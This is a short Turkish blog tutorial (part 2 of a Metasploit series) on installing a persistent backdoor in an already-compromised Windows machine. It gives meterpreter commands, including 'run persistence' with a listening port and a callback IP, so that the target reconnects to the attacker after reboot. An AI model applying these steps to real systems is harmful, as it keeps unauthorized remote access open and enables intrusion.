Anasayfa » Metasploit – Bölüm 2 – Backdoor

Makaleyi Paylaş

Güvenlik

Metasploit – Bölüm 2 – Backdoor

Bu makalde ele geçirilmiş bir windows işletim sistemine nasıl backdoor (Arka Kapı) yerleştirilir bu konu ele alacağız.

 

İlk olarak aşağıda örnek bir trojan oluşturulmuştur, belirtilen port dinlemeye alınarak hedef sistemden reverse bağlantı alınmıştır.

clip_image002

Şimdi ise , meterpreter satırındayken “backround” komutunu kullanarak gelen bağlantıyı arka plana alıyoruz “sessions” komutu ile “ID” numarasını öğreniyoruz. Şimdi ise tekrardan “sessions -i ” şeklinde bağlantı yapılır. Meterpreter satırındayken persistence script’ini çalıştıracagız “run persistence -U i 5 -p <dinleme yapılan port> -r <bağlantıyı karşılayacak ip adresi>” şeklinde çalıştırılır.

clip_image004

Evet gerekli aşamalar sıkıntız bir şekilde gerçekleşti, şimdi test etmek için hedef sistemi shutdown veya restart edelim.


clip_image006

Evet sessions komutu çalıştırdıgımız zaman görüldüğü gibi hiçbir oturum yok. Hedef sistem açıldıktan sonra “run” komutunu kullanarak sisteme tekrardan giriş sağlıyoruz.

clip_image008

Umarım faydalı bir makale olmuştur, bir sonraki makalemizde görüşmek üzere.

Makaleyi Paylaş

Cevap bırakın

Email adresiniz gizli kalacak Zorunlu alanlar * olarak işaretlenmiştir

Bunları kullanabilirsinizHTML etiketler ve öznitelikleri: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>